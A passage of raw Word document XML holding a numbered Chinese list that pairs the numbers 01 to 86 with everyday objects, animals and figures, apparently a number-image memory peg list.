        <w:t xml:space="preserve">  01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>小树</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>铃铛</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  03</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三脚架</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>汽车</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  05</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>手套</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="281"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>06</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>手枪</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  07</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>锄头</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>旱冰鞋</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  09</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>猫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>蜡烛</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鹅</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>耳朵</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>五星红旗</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>钩子</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>勺子</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>镰刀</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>眼镜</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>口哨</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>屎</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>木梯</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>椅子</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>赤脚医生</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>钥匙</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鹦鹉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>石榴</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仪器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>钱包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>衣钩</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>香烟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鳄鱼</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>双胞胎</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>衍悔和尚</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>闹钟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二胡</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>河流</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>耳机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶霸</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  29</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>饿囚</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三轮</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  31</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鲨鱼</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扇子</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  33</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>星星</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  34</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上司</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>老虎</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  36</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三鹿奶粉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  37</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>山鸡</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  38</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>妇女</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  39</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>胃药</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  40</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>司令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  41</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>蜥蜴</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  42</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>烂柿子</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  43</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>死神</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  44</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>蛇</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  45</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>师傅</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  46</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>饲料</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  47AK47</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>冲锋枪</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  48</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>石板</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  49</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>死狗</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>五环</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  51</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工人</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  52</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>蛇皮鼓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  53</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>乌纱帽</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  54</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>圆桌武士</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  55</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>火车</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  56</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>蜗牛</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  57</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原子弹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  58</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>狗尾巴</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  59</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>蜈蚣</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  60</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>榴莲</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  61</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>儿童</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  62</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>黄牛</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  63</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流沙</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>螺丝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  65</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尿壶</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  66</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>蝌蚪</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  67</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>油漆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  68</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大喇叭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  69</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>料酒</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  70</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>冰淇凌</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  71</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鸡翅</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  72</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>企鹅</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  73</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>人参精</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  74</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>骑士</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  75</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>红西服</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  76</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>汽油</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  77</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>机器人</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  78</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>青蛙</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  79</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>气球</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>巴黎铁塔</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  81</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大白蚁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  82</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶子</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  83</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>芭蕉扇</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  84</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>公交</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  85</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>夜明珠</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  86</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
